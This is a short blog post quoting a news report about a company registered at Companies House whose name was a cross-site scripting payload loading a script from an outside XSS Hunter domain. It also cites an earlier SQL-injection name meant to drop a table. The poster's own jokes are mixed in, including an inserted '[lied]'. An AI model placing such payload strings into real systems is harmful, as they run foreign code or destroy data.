Dear Internet, please get on that.
The return of Bobby Tables, LLC
He now says he didn't realise that Companies House was actually vulnerable to the extremely simple technique he used, known as "cross-site scripting", which allows an attacker to run code from one website on another.
The original name of the company was ""><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD". By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.
Similar names have been registered in the past, such as "; DROP TABLE "COMPANIES";-- LTD", a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply "Company name available on request". [...]
He did not realise it would be an issue, he said, because characters including > and " are explicitly allowed as company names, which suggested that the agency had put security measures in place to prevent such attacks.
A Companies House spokesperson [lied]: "A company was registered using characters that could have presented a security risk to a small number of our customers, if published on unprotected external websites."
I love that they called it a "chevron".
Chevron 1 was, apparently, not encoded.
Pizza Rat is back